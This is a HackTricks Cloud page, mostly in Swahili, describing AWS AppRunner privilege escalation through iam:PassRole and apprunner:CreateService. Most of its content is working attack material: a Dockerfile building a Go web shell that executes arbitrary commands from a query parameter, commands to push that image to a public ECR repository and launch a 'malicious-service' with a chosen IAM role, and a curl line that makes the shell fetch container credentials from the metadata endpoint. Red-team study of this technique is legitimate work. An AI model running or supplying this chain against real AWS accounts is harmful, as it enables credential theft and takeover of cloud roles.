HackTricks CloudAWS - AppRunner Privesc
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
AppRunner
iam:PassRole, apprunner:CreateService
Mshambuliaji mwenye vibali hivi anaweza kuunda service ya AppRunner yenye IAM role iliyounganishwa, na hivyo anaweza kuongeza mamlaka kwa kupata credentials za role hiyo.
Mshambuliaji kwanza huunda Dockerfile inayotumika kama web shell kwa kutekeleza amri yoyote kwenye container ya AppRunner.
FROM golang:1.24-bookworm
WORKDIR /app
RUN apt-get update && apt-get install -y ca-certificates curl
RUN cat <<'EOF' > main.go
package main
import (
"fmt"
"net/http"
"os/exec"
)
func main() {
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
command := exec.Command("sh", "-c", r.URL.Query().Get("cmd"))
output, err := command.CombinedOutput()
if err != nil {
fmt.Fprint(w, err.Error(), output)
return
}
fmt.Fprint(w, string(output))
})
http.ListenAndServe("0.0.0.0:3000", nil)
}
EOF
RUN go mod init test && go build -o main .
EXPOSE 3000
CMD ["./main"]
Kisha, push image hii kwenye ECR repository.
Kwa ku-push image kwenye public repository ndani ya AWS account inayodhibitiwa na attacker, privilege escalation inawezekana hata kama victim's account haina permissions za ku-manipulate ECR.
IMAGE_NAME=public.ecr.aws/<alias>/<namespace>/<repo-name>:latest
docker buildx build --platform linux/amd64 -t $IMAGE_NAME .
aws ecr-public get-login-password | docker login --username AWS --password-stdin public.ecr.aws
docker push $IMAGE_NAME
docker logout public.ecr.aws
Ifuatayo, mshambuliaji anaunda huduma ya AppRunner iliyosanidiwa na web shell image hii na IAM Role wanayotaka exploit.
aws apprunner create-service \
--service-name malicious-service \
--source-configuration '{
"ImageRepository": {
"ImageIdentifier": "public.ecr.aws/<alias>/<namespace>/<repo-name>:latest",
"ImageRepositoryType": "ECR_PUBLIC",
"ImageConfiguration": { "Port": "3000" }
}
}' \
--instance-configuration '{"InstanceRoleArn": "arn:aws:iam::123456789012:role/AppRunnerRole"}' \
--query Service.ServiceUrl
Baada ya kusubiri uundaji wa service kukamilika, tumia web shell kupata container credentials na kupata ruhusa za IAM Role iliyounganishwa na AppRunner.
curl 'https://<service-url>/?cmd=curl+http%3A%2F%2F169.254.170.2%24AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
Athari Inayowezekana: privilege escalation ya moja kwa moja kwa IAM role yoyote ambayo inaweza kuambatishwa kwenye huduma za AppRunner.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.